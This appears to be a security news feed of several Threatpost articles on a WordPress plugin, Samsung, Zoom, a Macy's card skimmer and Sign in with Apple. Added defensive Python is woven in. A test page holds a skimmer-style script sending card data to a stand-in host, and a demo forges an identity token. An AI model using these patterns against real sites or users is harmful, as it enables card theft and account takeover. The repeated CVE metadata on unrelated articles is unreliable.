The flaws can be exploited by remote, unauthenticated attackers to launch varying attacks \u2013 including fully taking over vulnerable websites.\n\nThe plugin, [Quiz and Survey Master](<https://wordpress.org/plugins/quiz-master-next/>), is actively installed on over 30,000 websites. The two critical flaws discovered by researchers include an arbitrary file-upload vulnerability, ranking 10 out of 10 on the CVSS scale; as well as an unauthenticated arbitrary file deletion error, ranking 9.9 out of 10. A patch is available for both issues in version 7.0.1 of the plugin, said the researchers with Wordfence who discovered the flaws, [in a Thursday post](<https://www.wordfence.com/blog/2020/08/critical-vulnerabilities-patched-in-quiz-and-survey-master-plugin/>).\n\n\u201cThe unauthenticated arbitrary file-deletion vulnerability that was present in the plugin is pretty significant,\u201d Chloe Chamberland, threat analyst with Wordfence, told Threatpost. \u201cAny of the 30,000 sites running the plugin are subject to any file being deleted (granted they are running a vulnerable version), which includes the wp-config.php file, by unauthenticated site users.\u201d\n\nThe two vulnerabilities stemmed from a feature in the plugin that enables site owners to implement file uploads as a response type for a quiz or survey. For instance, if a website has a job-application questionnaire, the feature gives users the option to upload a PDF resume at the end.\n\nResearchers found that this feature was insecurely implemented: \u201cThe check to verify file type only looked at the \u2018Content-Type\u2019 field during an upload, which could be easily spoofed,\u201d said researchers. 
\u201cThis meant that if a quiz contained a file upload which was configured to only accept .txt files, an executable PHP file could be uploaded by setting the \u2018Content-Type\u2019 field to \u2018text/plain\u2019 to bypass the plugin\u2019s weak checks.\u201d\n\nIn an example of a real-world attack, unauthenticated users could leverage this flaw by uploading malicious, arbitrary files, including PHP files. That would enable them to achieve remote code-execution, and ultimately, \u201cthis could lead to complete site takeover and hosting account-compromise, amongst many other scenarios,\u201d said researchers.\n\nMeanwhile, the arbitrary file-deletion error exists within the plugin\u2019s functionality for removing any files that were uploaded during the quiz. Due to AJAX actions not being authenticated in the file-deletion functionality, an unauthenticated user could delete important files \u2013 like a website\u2019s wp-config.php file. This is a core WordPress file that contains information about the database \u2013 including the name, username and password \u2013 that allows WordPress to communicate with the database to store and retrieve data.\n\n\u201cIf the wp-config.php file is deleted, WordPress assumes there is a fresh installation at which point an attacker can establish a new database connection, gain access to the site and upload a webshell to ultimately achieve persistence or infect other sites in the same hosting account,\u201d Chamberland told Threatpost.\n\nResearchers discovered the flaws on July 17, and after various unsuccessful attempts to contact the QSM plugin team, finally reached out to the plugin\u2019s parent company, ExpressTech on Aug. 1. A patch was released on Aug. 5 in version 7.0.1. 
The CVE assignments for both flaws are still pending, researchers said.\n\n\u201cWe highly recommend updating to version 7.0.1 immediately to keep your site protected against any attacks attempting to exploit this vulnerability,\u201d said researchers.\n\nThreatpost has reached out to ExpressTech for further commentary.\n", "cvss3": {}, "published": "2020-08-14T18:26:07", "type": "threatpost", "title": "Critical Flaws in WordPress Quiz Plugin Allow Site Takeover", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-08-14T18:26:07", "id": "THREATPOST:CFF3DDE464C215A7BDD3772ADFCDA4EE", "href": "https://threatpost.com/critical-flaws-wordpress-quiz-plugin-site-takeover/158379/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-16T22:18:47", "description": "Researchers have disclosed a slew of critical-severity, patched flaws in flagship Samsung smartphones \u2013 including the Galaxy S7, S8 and S9 models. 
The vulnerabilities specifically stem from Samsung\u2019s [\u201cFind My Mobile\u201d](<https://findmymobile.samsung.com/>) service, a feature built into the smartphones allowing users to locate their devices if they lose them.\n\nResearchers with Char49, who discovered the four glitches, said that if a bad actor convinced a target to download a malicious application onto their device, the flaws could have been chained together to launch various insidious attacks. These could ultimately have resulted in complete data loss for the smartphone user (via a factory reset). Attackers could also track users\u2019 real-time locations, spy on phone calls and messages, lock users out of their phones, or unlock phones.\n\nIn a real-life attack, that could mean that \u201cwhen attacked, the device can be spied on or, in the worst-case scenario, wiped clean of all its data, without the victim even perceiving what was happening, exposing the victim to situations of blackmail and extortion,\u201d said researchers with Char49 in an [analysis of the flaws](<http://char49.com/tech-reports/fmmx1-report.pdf>) [PDF].\n\nResearchers told Threatpost that the vulnerabilities were first reported to Samsung Feb. 21, 2019, and quietly fixed by the smartphone company on April 7, 2019. However, the flaws were not disclosed until this past Friday, when Char49 researchers presented them [during a DEFCON session.](<https://www.youtube.com/watch?v=qbj-4NXsE-0&feature=youtu.be&t=1495>)\n\nResearchers also told Threatpost that there are no CVEs assigned to the flaws, as Samsung opted not to disclose the issues publicly on its website. However, Samsung did issue an internal SVE for the bugs (SVE-2019-14025), which is Samsung\u2019s identification mechanism for security issues, and classified the flaws as \u201ccritical.\u201d\n\n## **The Flaws**\n\nResearchers found four vulnerabilities in total in Find My Mobile. 
The first issue is that it\u2019s possible for a malicious app (installed on the smartphone) to change the URL endpoints that Find My Mobile uses to communicate with the backend servers. In an attack scenario, this means that when the Find My Mobile app makes a call to the backend servers, it \u201callows an attacker to create a man-in-the middle (MiTM) scenario, monitoring Find My Mobile calls to the backend and, as we will see, to manipulate them,\u201d said researchers.\n\nThe second issue stems from three \u201cexported broadcast receivers\u201d (com.sec.pcw.device.receiver.PCWReceiver) in the service that are not protected by permissions. [Broadcast receivers](<https://developer.android.com/guide/topics/manifest/receiver-element>) enable applications to receive intents that are broadcast by the system or by other applications, even when other components of the application are not running. Researchers said that sending a broadcast with a certain action (com.samsung.account.REGISTRATION_COMPLETED) can cause the backend server URL endpoints to be updated to an attacker-controlled value. That means attackers can then monitor and control traffic from Find My Mobile to the backend servers.\n\n\u201cSo now, at server side, the attacker has lots of sensitive information,\u201d said researchers. \u201cTo start, the victim\u2019s coarse location via the IP address of the request, but also several PIIs [personal identifiable information], both registrationId (from the 2 requests) and the victim\u2019s IMEI. This alone allows for user tracking. The attacker also gets, among other things, device brand\u2026 and other information not important for this attack scenario.\u201d\n\nThe third flaw stems from another unprotected broadcast receiver (com.sec.pcw.device.receiver.SPPReceiver). Researchers found that an attacker could leverage this flaw by sending a broadcast with a certain action to the broadcast receiver. 
This results in Find My Mobile contacting the Device Management (DM) server for updates: \u201cWhen Find My Mobile contacts the DM server, the DM can reply just with an equivalent to an OK or, most importantly, the accumulated actions requested by the user and missed by Find My Mobile while the smartphone was offline. And this is where an attacker can step in. If an attacker can modify a server response to include an action of his choosing, he can tell the smartphone which action to take,\u201d said researchers.\n\nThe final flaw discovered is a glitch in ncml:auth-md5, a base64-encoded string that authenticates the message from the server. Researchers found that an issue in the authentication method allows any server reply to be accepted.\n\n\u201cWe\u2019re pretty sure it was not supposed to be implemented like this,\u201d said researchers. \u201cThere is no message signing or any mechanism that prevents message modification, which is great for an attacker.\u201d\n\nResearchers constructed an attack that chains these four flaws together. By convincing a target to install a malicious app on their device (via spear phishing or by other means), these flaws can allow an attacker to carry out any action that Find My Mobile can perform.\n\n\u201cThis attack was tested successfully on different devices (Samsung Galaxy S7, S8 and S9+). The [Proof of Concept] involves an APK [Android Application Package] and the server-side code that implements the logic needed to inject actions in the server responses,\u201d said researchers.\n\nSamsung smartphones have been found to have various security issues over the past year. 
Last year, [Samsung rolled out](<https://threatpost.com/galaxy-s10-fingerprint-sensor-thwarted-with-screen-protector-report/149197/>) a software patch for the Galaxy S10 and Note10, addressing glitches in both phone models that allowed the bypass of their built-in fingerprint authentication sensors. [Also in 2019,](<https://threatpost.com/samsung-lg-android-spearphone-eavesdropping/146625/>) a new way to eavesdrop on people\u2019s mobile phone calls was uncovered after researchers unveiled an attack making use of Android devices\u2019 on-board accelerometers (motion sensors) to infer speech from the devices\u2019 speakers.\n\nThreatpost has reached out to Samsung for comment on the patched flaws.\n", "cvss3": {}, "published": "2020-08-11T14:48:41", "type": "threatpost", "title": "Samsung Quietly Fixes Critical Galaxy Flaws Allowing Spying, Data Wiping", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-08-11T14:48:41", "id": "THREATPOST:E9212954E31E4447FD755C9E210A641F", "href": "https://threatpost.com/samsung-quietly-fixed-critical-galaxy-flaws-allowing-spying-data-wiping/158241/", "cvss": {"score": 0.0, "vector": "NONE"}}, 
{"lastseen": "2020-10-15T22:16:33", "description": "A previously undisclosed bug in Zoom\u2019s customizable URL feature has been addressed that could have offered a hacker a perfect social-engineering avenue for stealing credentials or sensitive information.\n\nDisclosed by Zoom and Check Point on Thursday, the security flaw existed in the \u201cVanity URL\u201d feature for Zoom, which allows companies to set up their own Zoom meeting domain, i.e. \u201cyourcompany.zoom.us.\u201d Companies can add customized logos and branding to the page, and end users access the page and click meeting links within that page to connect to a Zoom call. Aside from the convenience driver for setting it up, the feature is also required for configuration if users want to turn on Single Sign-On for the video service.\n\nTo mount an attack, cybercriminals would pose as a legitimate employee in a company, and then send a meeting invitation ostensibly from an organization\u2019s Vanity URL to intended victims \u2013 customers, partners, suppliers and so on. 
However, the attackers would actually be using an invitation URL that included a registered sub-domain of their choice \u2013 not the real Vanity URL of the spoofed company.\n\n\u201cIn other words, if the original link was https://zoom.us/j/##########, the attacker could change it to https://<organization\u2019s name>.zoom.us/j/##########,\u201d according to [an analysis](<https://blog.checkpoint.com/2020/07/16/fixing-the-zoom-vanity-clause-check-point-and-zoom-collaborate-to-fix-vanity-url-issue/>) from Check Point issued Thursday. \u201cWithout particular cybersecurity training on how to recognize the appropriate URL, a user receiving this invitation may not recognize that the invitation was not genuine or issued from an actual or real organization.\u201d\n\nA second way to initiate an attack would be to target dedicated Zoom web interfaces.\n\n\u201cSome organizations have their own Zoom web interface for conferences,\u201d according to Check Point. \u201cA hacker could target such an interface and attempt to redirect a user to enter a meeting ID into the malicious Vanity URL rather than the actual or genuine Zoom web interface. As with the direct links attacks, without careful cybersecurity training, a victim of such attacks may not have been able to recognize the malicious URL and have fallen prey to the attack.\u201d\n\nUltimately, once in the meeting, the attacker could continue to pose as a company employee, and proceed to extract credentials and sensitive information, as well as carry out other fraud actions, by asking certain questions or requesting that materials be sent over.\n\nCheck Point didn\u2019t release technical details of the bug, but did note that \u201cThere are several ways to enter a meeting containing a sub-domain, including using a direct sub-domain link containing the meeting ID, or using the organization\u2019s customized sub-domain web UI.\u201d\n\nZoom has fixed the issue on its end, closing the exploit capability off. 
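Check Point's point is that a link under any registered subdomain of zoom.us looks legitimate, so a suffix check is not enough. The following is an added example (not Check Point's or Zoom's code) of the check a mail gateway or a user-facing tool can apply before trusting an invitation: an exact-match allowlist of hosts. The organisation's vanity host `acme.zoom.us` and the `/j/<meeting id>` path form are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit

# Assumed allowlist for one organisation: the bare service host plus the single
# vanity subdomain that organisation registered. Constructed values.
ALLOWED_HOSTS = frozenset({"zoom.us", "acme.zoom.us"})

# Assumption: invitations from this organisation use the /j/<meeting id> form
# shown in the article (Zoom meeting IDs are 9 to 11 digits).
_JOIN_PATH = re.compile(r"^/j/\d{9,11}$")


def classify_invite(url, allowed_hosts=ALLOWED_HOSTS):
    """Return 'ok' or a short reason the invitation should be treated as suspect.

    The host test is an exact match against the allowlist. A '.zoom.us' suffix
    is deliberately not enough: every registered vanity subdomain carries that
    suffix, which is exactly what the spoofed invitations relied on."""
    parts = urlsplit(url.strip())
    if parts.scheme != "https":
        return "scheme is not https"
    host = (parts.hostname or "").lower().rstrip(".")
    if not host:
        return "no host"
    if parts.username or parts.password:
        # 'https://acme.zoom.us@evil.example/...' puts the trusted name in the userinfo
        return "credentials embedded in URL (host is " + host + ")"
    if host not in allowed_hosts:
        if host.endswith(".zoom.us"):
            return "unexpected zoom.us subdomain: " + host
        return "host is not an allowed Zoom host: " + host
    if not _JOIN_PATH.match(parts.path):
        return "path is not a /j/<meeting id> join link: " + parts.path
    return "ok"


def triage(urls, allowed_hosts=ALLOWED_HOSTS):
    """Map each URL to its verdict; handy over a batch of invitations pulled from mail."""
    return {u: classify_invite(u, allowed_hosts) for u in urls}


if __name__ == "__main__":
    for url, verdict in triage([
        "https://acme.zoom.us/j/1234567890",
        "https://evil.zoom.us/j/1234567890",
        "https://zoom.us.evil.example/j/1234567890",
    ]).items():
        print(verdict, "<-", url)
```

The allowlist has to be maintained per organisation (the vanity subdomain is an organisational fact, not something derivable from the URL), which is why the article's advice comes down to training: nothing in the link itself distinguishes a real vanity host from one an attacker registered.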
Researchers at Check Point told Threatpost that they aren\u2019t aware of in-the-wild attacks prior to the fix.\n\n\u201cZoom has addressed the issue reported by Check Point and put additional safeguards in place for the protection of its users,\u201d a Zoom spokesperson told Threatpost, adding that the firm did not consider the issue a zero-day bug. The person went on, \u201cZoom encourages its users to thoroughly review the details of any meeting they plan to attend prior to joining, and to only join meetings from users they trust. We appreciate Check Point notifying us of this issue. If you think you\u2019ve found a security issue with Zoom products, please send a detailed report to security@zoom.us.\u201d\n\n\u201cBecause Zoom has become one of the world\u2019s leading communication channels for businesses, governments and consumers, it\u2019s critical that threat actors are prevented from exploiting Zoom for criminal purposes,\u201d added Adi Ikan, group manager at Check Point, in a statement to media.\n\nThe firm noted in its analysis that while the video conferencing service was already popular before the pandemic, in the \u2018new normal\u2019 of social distancing it has \u201cbecome the go-to platform globally for everything from high-level government and business meetings, to university and school classes, to family gatherings \u2013 meaning that Zoom usage has soared from 10 million daily meeting participants back in December 2019 to over 300 million in April 2020.\u201d\n\n## Zoom Security Parade Continues\n\nZoom continues to face security issues, even as hackers continue to probe the platform for weaknesses.\n\nLast week, the popular video service [patched a zero-day bug](<https://threatpost.com/unpatched-zoom-bug-rce/157317/>) in the Zoom Client for Windows that could have allowed remote code-execution. 
It impacted users of legacy versions of Windows, but was trivial to exploit, researchers said.\n\nAnd in April, it addressed [two zero-day flaws](<https://threatpost.com/two-zoom-zero-day-flaws-uncovered/154337/>) that were uncovered in Zoom\u2019s macOS client version, which could have given local, unprivileged attackers root privileges, and allowed them to access victims\u2019 microphone and camera. And also in April, several new databases [were uncovered on underground forums](<https://threatpost.com/troves-of-zoom-credentials-shared-on-hacker-forums/155163/>) sharing troves of recycled Zoom credentials.\n\nIn January, Zoom issued a [bevy of security fixes](<https://threatpost.com/zoom-fixed-flaw-opening-meetings-to-hackers/152266/>) after it came to light that the company\u2019s platform used weak authentication that made it possible for adversaries to join active meetings. The issues stemmed from Zoom\u2019s conference meetings not requiring a \u201cmeeting password\u201d by default.\n\nIn March and April, there were widespread reports of \u201cZoom-bombing,\u201d where trolls were [hijacking online meetings](<https://threatpost.com/fbi-threatens-zoom-bombing-trolls-with-jail-time/154495/>) in order to spread hate speech such as racist messages, threats of sexual harassment and pornographic images, which drove meeting participants offline or forced meetings to be abruptly cancelled.\n\nOther woes have also plagued the company, having to do with privacy. Zoom this spring [nixed a feature](<https://threatpost.com/zoom-removes-data-mining-linkedin-feature/154404/>) that came under fire for \u201cundisclosed data mining\u201d of users\u2019 names and email addresses, used to match them with their LinkedIn profiles. 
It also [removed a feature](<https://threatpost.com/zoom-kills-ios-apps-data-sharing-facebook/154275/>) in its iOS web conferencing app that was sharing analytics data with Facebook, after a report revealing the practice sparked outrage.\n\nMeanwhile, crooks will continue to target the platform, according to Check Point.\n\n\u201cIt\u2019s no surprise that the explosive growth in Zoom usage has been matched by an increase in new domain registrations with names including the word \u2018Zoom\u2019, indicating that cybercriminals are targeting Zoom domains as phishing bait to lure victims,\u201d the firm\u2019s analysis noted. \u201cWe have also detected malicious files impersonating Zoom\u2019s installation program.\u201d\n", "cvss3": {}, "published": "2020-07-16T16:14:17", "type": "threatpost", "title": "Zoom Addresses Vanity URL Zero-Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-07-16T16:14:17", "id": "THREATPOST:E07387431E59AD0A09420F7EFA295856", "href": "https://threatpost.com/zoom-vanity-url-zero-day/157510/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:28:51", "description": "The department store Macy\u2019s is warning that web skimmer malware was discovered on Macys.com collecting customers\u2019 payment card information. The attack [has been linked to Magecart](<https://www.bleepingcomputer.com/news/security/macys-customer-payment-info-stolen-in-magecart-data-breach/>), a notorious umbrella group made up of various cybercriminal affiliates that is known for injecting payment card skimmers into ecommerce websites.\n\nAccording to a data breach notice sent to customers, \u201can unauthorized third party added unauthorized computer code\u201d to Macys.com on Oct. 7. The code, which was discovered and removed on Oct. 
15, was collecting customers\u2019 first and last names, addresses, phone numbers, email addresses and payment card information (including number, security code and expiration date).\n\n\u201cThere is no reason to believe that this incident could be used by cybercriminals to open new accounts in your name. Nonetheless, you should remain vigilant for incidents of financial fraud and identity theft by regularly reviewing your account statements and immediately reporting any suspicious activity to your card issuer,\u201d said Macy\u2019s in its data [breach notice.](<https://www.documentcloud.org/documents/6552530-MACY-S-NOTICE-OF-DATA-BREACH.html>)\n\nWeb skimmers are injected by attackers into targeted websites and are designed to steal data entered into online payment forms on e-commerce sites. When a visitor goes to an infected site, popular skimmers \u2013 such as [Pipka](<https://threatpost.com/pipka-card-skimmer-removes-itself-after-infecting-ecommerce-sites/150341/>) or [Inter](<https://www.fortinet.com/blog/threat-research/inter-skimmer-for-all.html>) \u2013 scoop up the personal details entered on the page.\n\nThe web skimmer that affected Macys.com targeted two company-controlled web pages \u2013 the checkout page of the website and the My Wallet page. The My Wallet page lets customers manage and use payment options, promotions and savings passes from within their accounts. Macy\u2019s said that customers who checked out with the My Account wallet page on a mobile device or on the Macy\u2019s mobile application were not impacted.\n\n\u201cWe are aware of a data security incident involving a small number of our customers on Macys.com,\u201d a Macy\u2019s spokesperson told Threatpost. \u201cWe have investigated the matter thoroughly, addressed the cause and have implemented additional security measures as a precaution. 
All impacted customers have been notified, and we are offering consumer protections to these customers at no cost.\u201d\n\nHowever, the attack surface could be huge. Macys.com topped the list of retail apparel websites in terms of traffic in 2019: In an April analysis of U.S. retail apparel site rankings, [SimilarWeb cited Macys.com](<https://wwd.com/business-news/retail/similarweb-retail-list-1203118893/>) as number one with more than 55.7 million monthly visits.\n\nAn anonymous researcher [reportedly](<https://www.bleepingcomputer.com/news/security/macys-customer-payment-info-stolen-in-magecart-data-breach/>) linked the attack back to the Magecart group, an infamous [loose affiliation of attack groups](<https://threatpost.com/podcast-breaking-down-the-magecart-threat-part-two/139534/>) responsible for payment-card attacks on organizations from [Forbes](<https://threatpost.com/magecart-card-skimmer-forbes/144811/>) to [First Aid Beauty](<https://threatpost.com/magecart-attack-skin-care-site/149580/>). The researcher told Bleeping Computer that attackers altered the affected Macy\u2019s web pages to include obfuscated Magecart script.\n\nMacy\u2019s customers who are impacted should monitor their credit card statements for fraud-related activity. The company is also offering victims a free year of the Experian IdentityWorks credit monitoring service.\n\n\u201cWe quickly contacted federal law enforcement and brought in a leading class forensics firm to assist our investigation,\u201d said Macy\u2019s. \u201cWe have reported the relevant payment card numbers to the card brands (i.e. Visa, Mastercard, American Express and Discover). 
In addition, we have taken steps that we believe are designed to prevent this type of unauthorized code from being added to Macys.com.\u201d\n\nHowever, security pundits argue that retailers like Macy\u2019s need to do better at putting extra security measures against web skimmers in place proactively \u2013 particularly as companies like [Ticketmaster](<https://threatpost.com/ticketmaster-chat-feature-leads-to-credit-card-breach/133191/>), [Forbes](<https://threatpost.com/magecart-card-skimmer-forbes/144811/>), [British Airways](<https://threatpost.com/magecart-group-pinned-in-recent-british-airways-breach/137338/>) and [Newegg](<https://threatpost.com/magecart-strikes-again-siphoning-payment-info-from-newegg/137576/>) continue making headlines for Magecart-related breaches.\n\n\u201cMageCart is not a mystery; by now, one might think that \u2018additional security measures\u2019 would be added to all websites as a matter of course, before hackers drop in some malicious code,\u201d said Colin Bastable, CEO of Lucy Security, in an email. \u201cThat is the definition of a precaution. Macy\u2019s has implemented what should be described as a security postcaution.\u201d\n\nSecurity experts, for their part, stress the importance of established policies for verifying that internet-facing infrastructure is securely configured and patched \u2013 particularly for retailers as the holidays loom.\n\n\u201cHaving strong and robust third-party policies to restrict external access to sensitive information and only allow verified code or scripts to be executed will greatly reduce exposure,\u201d James McQuiggan, security awareness advocate at KnowBe4, said in an email.\n\n\u201cAnd if a breach does occur, the attacker\u2019s opportunity to get data is severely impeded,\u201d he said. 
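McQuiggan's "only allow verified code or scripts" translates, for a payment page, into an inventory of every script element checked against an allowlist. The following is an added example (not code from Macy's, KnowBe4 or the researcher who analysed the skimmer) of such an audit over a fetched copy of a checkout page: external scripts must come from a known location and carry a Subresource Integrity attribute, and inline scripts must hash to an expected CSP-style digest. The hosts, the sample page and the injected inline snippet are constructed; the snippet only illustrates the shape of a skimmer (read a card field on submit, beacon it elsewhere) and is not the obfuscated script found on Macys.com.

```python
import base64
import hashlib
from html.parser import HTMLParser

# Assumed allowlist of the external scripts the checkout page is supposed to load.
# Constructed hosts; not Macy's real assets.
ALLOWED_SRC = frozenset({"https://static.example-store.test/checkout.js"})


def csp_sha256(source):
    """'sha256-<base64>' over the script text: the form a CSP script-src hash
    (and, for external files, an SRI integrity attribute) uses."""
    return "sha256-" + base64.b64encode(hashlib.sha256(source.encode()).digest()).decode()


class _ScriptCollector(HTMLParser):
    """Collects every <script> with its src, integrity attribute and inline text."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._open = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            a = dict(attrs)
            self._open = {"src": a.get("src"), "integrity": a.get("integrity"), "text": ""}

    def handle_data(self, data):
        if self._open is not None:
            self._open["text"] += data

    def handle_endtag(self, tag):
        if tag == "script" and self._open is not None:
            self.scripts.append(self._open)
            self._open = None


def audit_scripts(html, allowed_src=ALLOWED_SRC, allowed_inline=frozenset()):
    """Return (reason, detail) findings for every script the allowlists do not cover:
    an external script from an unknown location, an allowed external script shipped
    without SRI, or an inline script whose hash is not on the expected list."""
    parser = _ScriptCollector()
    parser.feed(html)
    findings = []
    for s in parser.scripts:
        if s["src"]:
            if s["src"] not in allowed_src:
                findings.append(("unknown external script", s["src"]))
            elif not s["integrity"]:
                findings.append(("allowed script without SRI integrity attribute", s["src"]))
        else:
            digest = csp_sha256(s["text"])
            if digest not in allowed_inline:
                findings.append(("unlisted inline script", digest))
    return findings


# Constructed checkout page: one legitimate external script with SRI, one expected
# inline snippet, then an unknown external script and an injected inline snippet
# whose shape (read a card field on submit, beacon it to another host) is an
# illustration of a skimmer, not the code found on Macys.com.
SAMPLE_CHECKOUT_PAGE = """
<html><body>
<form id="checkout"><input id="cc-number"><button>Pay</button></form>
<script src="https://static.example-store.test/checkout.js"
        integrity="sha384-constructedDigestValue" crossorigin="anonymous"></script>
<script>window.dataLayer = window.dataLayer || [];</script>
<script src="https://cdn.example-store.test/analytics.js"></script>
<script>var _0x4a=['value','cc-number'];document.addEventListener('submit',function(){new Image().src='https://exfil.invalid/?d='+btoa(document.getElementById(_0x4a[1])[_0x4a[0]]);});</script>
</body></html>
"""

EXPECTED_INLINE = frozenset({csp_sha256("window.dataLayer = window.dataLayer || [];")})


def audit_sample():
    return audit_scripts(SAMPLE_CHECKOUT_PAGE, allowed_inline=EXPECTED_INLINE)


if __name__ == "__main__":
    for reason, detail in audit_sample():
        print(f"{reason}: {detail}")
```

Run on a schedule against each payment page and diff the findings: the obfuscated inline script the researcher described surfaces as an unlisted inline hash the first time it appears. The same allowlist, expressed as a Content-Security-Policy `script-src` with hashes or nonces plus SRI on external files, makes the browser enforce it rather than an after-the-fact scan.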
\u201cMacy\u2019s customers should pay extra attention to emails sent to them regarding the Macy\u2019s breach, as criminals will leverage the attack to get them to click on phishing links for false sites or open attachments that contain malicious software.\u201d\n", "cvss3": {}, "published": "2019-11-19T14:56:38", "type": "threatpost", "title": "Macy's Suffers Data Breach by Magecart Cybercriminals", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2019-11-19T14:56:38", "id": "THREATPOST:76BC8D329A74BD12883D2CEFFA552A54", "href": "https://threatpost.com/macys-data-breach-linked-to-magecart/150393/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:19:05", "description": "A researcher recently found a critical Apple vulnerability that, if exploited, could enable remote attackers to abuse the \u201cSign in with Apple\u201d feature to take over victims\u2019 third-party application accounts. The security researcher, Bhavuk Jain, reported the flaw to Apple via its bug bounty program, and was awarded $100,000 for the find.\n\nThe flaw stemmed from the \u201c[Sign in with Apple](<https://developer.apple.com/sign-in-with-apple/>)\u201d feature, which was introduced by Apple at its Worldwide Developers Conference last year. 
Sign in with Apple aimed to make it easy and secure for Apple users to sign into third-party apps and websites. It did this by implementing an Apple-backed authentication system to replace social logins on third-party services.\n\n\u201cIn the month of April, I found a zero-day in Sign in with Apple that affected third-party applications which were using it and didn\u2019t implement their own additional security measures,\u201d said Jain, [in his disclosure of the bug on Sunday](<https://bhavukjain.com/blog/2020/05/30/zeroday-signin-with-apple/>). \u201cThis bug could have resulted in a full account takeover of user accounts on that third party application irrespective of a victim having a valid Apple ID or not.\u201d\n\nApple has since fixed the flaw. Threatpost has reached out to Apple for further comment.\n\nOne of the highlights of Sign in with Apple is that users could sign up with third-party services without needing to disclose their Apple ID email address to these services. This worked because Sign in with Apple would first validate users on the client side, and then initiate a JSON Web Token (JWT) request from Apple\u2019s authentication services. This JWT would then be used by the third-party app to confirm the user\u2019s identity.\n\nThe issue was that after Apple validated the user on the client side via their Apple ID email address, it did not verify that the JWT request was from that actual user account. An attacker could abuse this flaw by providing an Apple ID email that belongs to the victim and tricking Apple servers into generating a valid JWT payload. 
Once an attacker does this, he can then sign into a third-party app using the victim\u2019s identity.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/06/01105057/flow_apple_auth.png>)\n\nCredit: Bhavuk Jain\n\n\u201cI found I could request JWTs for any Email ID from Apple and when the signature of these tokens was verified using Apple\u2019s public key, they showed as valid,\u201d he said. \u201cThis means an attacker could forge a JWT by linking any Email ID to it and gaining access to the victim\u2019s account.\u201d\n\nAccording to [The Hacker News](<https://thehackernews.com/2020/05/sign-in-with-apple-hacking.html>), the flaw could be exploited even if users had decided to hide their email IDs from third-party services. It could also be exploited to sign up new accounts with victims\u2019 Apple IDs.\n\nThere are two hoops that attackers would need to jump through to make this exploit work. First, they would need an email ID for an Apple user \u2013 though that could be any Apple user\u2019s email ID. Second, they would need to log into a third-party app via Sign in with Apple that didn\u2019t require any further security measures.\n\nJain said the impact of this vulnerability is \u201cquite critical\u201d as it could allow full account takeover. Many developers have integrated Sign in with Apple into their services, including Dropbox, Spotify, Airbnb, and Giphy.\n\n\u201cThese applications were not tested but could have been vulnerable to a full account takeover if there weren\u2019t any other security measures in place while verifying a user,\u201d Jain said.\n\nJain said that Apple conducted an investigation of their logs and determined there was no misuse or account compromise due to this vulnerability. The researcher found the flaw in April and reported it via Apple\u2019s bug bounty program which earned him $100,000. 
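The flaw Jain describes sits on the issuer side: the identity written into the token came from the client's request rather than from the account that had just authenticated, so a relying party doing everything right (signature, issuer, audience, expiry) still accepted it. The following is an added example of that issuance check, missing and then present, with the relying-party verification beside it. It is neither Jain's PoC nor Apple's implementation: HS256 with a shared key stands in for Apple's RS256 keypair so that only the standard library is needed, and the issuer name, key, audience and email addresses are constructed.

```python
"""Token issuance bound (or not) to the authenticated account.

HS256 with a shared key stands in for the issuer's RS256 keypair so the
example needs only the standard library; the relying party's position is the
same either way: it can verify that the issuer signed the token, not how the
issuer decided what identity to put in it."""
import base64
import hashlib
import hmac
import json
import time

ISSUER_KEY = b"constructed-issuer-key-not-a-real-secret"   # constructed
ISSUER = "https://id.issuer.example.test"                  # assumed issuer name


def _b64url(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_jwt(claims, key=ISSUER_KEY):
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload = _b64url(json.dumps(claims, sort_keys=True).encode())
    sig = _b64url(hmac.new(key, f"{header}.{payload}".encode(), hashlib.sha256).digest())
    return f"{header}.{payload}.{sig}"


def verify_jwt(token, audience, key=ISSUER_KEY, now=None):
    """Relying party: signature, issuer, audience and expiry. Returns the
    claims on success, None otherwise. Note what it cannot check: whether the
    email inside was the one the issuer actually authenticated."""
    try:
        header, payload, sig = token.split(".")
    except ValueError:
        return None
    expected = _b64url(hmac.new(key, f"{header}.{payload}".encode(), hashlib.sha256).digest())
    if not hmac.compare_digest(expected, sig):
        return None
    claims = json.loads(_b64url_decode(payload))
    now = time.time() if now is None else now
    if claims.get("iss") != ISSUER or claims.get("aud") != audience or claims.get("exp", 0) < now:
        return None
    return claims


def issue_token_vulnerable(session, requested_email, audience):
    """Issuer side as the article describes the bug: the identity that goes
    into the token is taken from the client-supplied request, and the
    authenticated session is never consulted."""
    return sign_jwt({"iss": ISSUER, "aud": audience, "exp": time.time() + 600,
                     "email": requested_email})


def issue_token_fixed(session, requested_email, audience):
    """Issuer side with the missing check: the token may only name the account
    that authenticated in this session."""
    if requested_email != session["email"]:
        raise PermissionError("requested identity does not match the authenticated account")
    return sign_jwt({"iss": ISSUER, "aud": audience, "exp": time.time() + 600,
                     "email": session["email"]})


def demo(audience="com.example.thirdpartyapp"):
    """Attacker authenticates as themselves, then asks for a token naming the victim."""
    attacker_session = {"email": "attacker@example.test"}
    victim_email = "victim@example.test"

    forged = issue_token_vulnerable(attacker_session, victim_email, audience)
    forged_claims = verify_jwt(forged, audience)        # valid signature: RP accepts
    try:
        issue_token_fixed(attacker_session, victim_email, audience)
        fixed_refused = False
    except PermissionError:
        fixed_refused = True
    genuine = issue_token_fixed(attacker_session, attacker_session["email"], audience)
    return {
        "forged_accepted_as": forged_claims["email"] if forged_claims else None,
        "fixed_refused": fixed_refused,
        "genuine_email": verify_jwt(genuine, audience)["email"],
    }


if __name__ == "__main__":
    print(demo())
```

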